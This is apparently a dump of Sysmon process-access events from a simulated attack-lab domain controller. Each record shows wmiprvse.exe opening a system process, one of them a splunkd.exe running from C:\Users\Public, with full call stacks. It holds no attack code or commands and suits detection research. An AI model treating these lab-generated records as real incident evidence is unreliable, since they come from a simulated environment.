15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022419Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022418Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022417Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022416Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022415Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022414Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022413Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022412Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022411Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022410Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022409Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022408Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022407Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022406Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022405Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022404Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022403Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022402Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022401Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022400Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 